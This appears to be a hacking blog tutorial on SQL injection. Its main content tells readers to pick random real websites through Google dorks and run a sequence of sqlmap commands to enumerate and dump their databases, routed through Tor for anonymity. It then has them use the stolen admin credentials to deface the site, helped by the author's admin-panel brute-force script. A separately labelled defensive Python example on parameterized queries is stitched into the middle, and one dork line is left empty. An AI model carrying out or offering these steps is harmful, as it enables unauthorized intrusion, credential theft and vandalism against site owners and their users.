Most websites need a database to store their data, usually an RDBMS (relational database management system). These databases store data in tables and columns so that it can be queried easily. Server-side languages like PHP interact with the SQL database using credentials that grant read and/or write permissions. Most of the sensitive information, such as login credentials, is stored in these databases. An attacker's first preference is therefore to compromise the database, so that they can log in to the admin panel with the credentials they retrieved.
SQL injection is a method of exploiting a vulnerability in a server-side script. Scripts that do not filter special characters properly are vulnerable to this attack. If an unfiltered string is allowed into the query, that string gets executed as part of the query. Injecting custom-crafted queries into a script this way is called SQL injection.
Consider a scenario: a PHP script accepts a GET parameter "name" and searches a table in a database (e.g. URL: www.example.com/search.php?name=bill).
The query looks like this:
SELECT * FROM `profiles` WHERE name = 'bill';
If you add a single quote at the end of the URL (name=bill'),
the query gets executed like this:
SELECT * FROM `profiles` WHERE name = 'bill'';
This produces a syntax error, which means the target is vulnerable: the input reached the query unfiltered, and the extra quote left the string literal unterminated. Instead of a single quote, custom queries are then injected to fetch the sensitive data.
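The difference between pasting the input into the SQL text and binding it as a parameter, shown as an added runnable example (not code from the original post): an in-memory SQLite table stands in for the post's `profiles` table, and the same quoted input goes through a concatenated query and a parameterized one. The table contents are constructed, and sqlite3 is used in place of the PHP/MySQL stack the post describes.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the post's `profiles` table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE profiles (id INTEGER PRIMARY KEY, name TEXT, email TEXT)"
    )
    conn.executemany(
        "INSERT INTO profiles (name, email) VALUES (?, ?)",
        [("bill", "bill@example.com"), ("alice", "alice@example.com")],
    )
    return conn


def search_concatenated(conn, name):
    """The vulnerable pattern from the post: user input is pasted into the SQL text.

    Returns ("ok", rows) when the query runs, or ("error", message) when the
    input breaks the statement's syntax, as a trailing single quote does.
    """
    query = "SELECT * FROM profiles WHERE name = '" + name + "'"
    try:
        return ("ok", conn.execute(query).fetchall())
    except sqlite3.OperationalError as exc:
        return ("error", str(exc))


def search_parameterized(conn, name):
    """The fix: a bound parameter, so the driver treats the input as data only.

    A quote in the input is just a character in the value being compared; it
    can never terminate the string literal or change the statement.
    """
    rows = conn.execute(
        "SELECT * FROM profiles WHERE name = ?", (name,)
    ).fetchall()
    return ("ok", rows)


if __name__ == "__main__":
    db = make_db()
    for value in ("bill", "bill'"):
        print(repr(value), "concatenated ->", search_concatenated(db, value))
        print(repr(value), "parameterized ->", search_parameterized(db, value))
```

The quoted input errors out in search_concatenated and simply matches no row in search_parameterized. Any quote, comment sequence or keyword gets the same treatment there, which is why parameterized queries (prepared statements via PDO or mysqli in PHP) are the standard fix rather than filtering special characters.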
Finding a target
You can pick a target at random using Google dorks. In the Google search bar, try the keyword:
You will get plenty of results; choose a target and open the URL with a quote added at the end. If the website shows a syntax error or a blank page, the site is most probably vulnerable. Copy the target URL to the clipboard. There are plenty of other dorks; try those too.
Sqlmap is a Python script designed exclusively for database attacks. It is very stable and has a great many options. So let's start.
# sqlmap -u http://target.com/vuln.php?id=1 --dbs
This is the first step. Sqlmap scans the given parameter for every injection technique it knows. Once it finds a working method, sqlmap asks whether you want to keep testing for other vulnerabilities; you can stop or continue, that is up to you. Since we passed the --dbs option, sqlmap retrieves the database names. Once you have a database name you can fetch its tables and columns:
# sqlmap -u http://target.com/vuln.php?id=1 -D database_name --tables
After fetching the database and its tables, fetch the columns:
# sqlmap -u http://target.com/vuln.php?id=1 -D database_name -T table_name --columns
Dump the data from the columns:
# sqlmap -u http://target.com/vuln.php?id=1 -D database_name -T table_name -C column_name --dump
Sqlmap can be routed through the Tor proxy for a safer, anonymous attack:
# sqlmap --tor --check-tor --tor-type=SOCKS5 -u http://target.com/vuln.php?id=1 --dbs
Increase the speed using multi-threading:
# sqlmap --threads 10 -u http://target.com/vuln.php?id=1 --dbs
This will get you the admin login details. With those you can access the control panel and deface the whole website. I have written a simple script to find the admin panel of a website. Download cpscan.py from GitHub, or clone it directly with the command:
# git clone https://github.com/susmithHCK/cpscan.git
This Python script brute-forces all the likely directories on a server and detects the control panel by HTTP response code. It can detect the panel on almost 85% of websites. Hope this helped you guys. Any doubts or questions, please use the comment box below.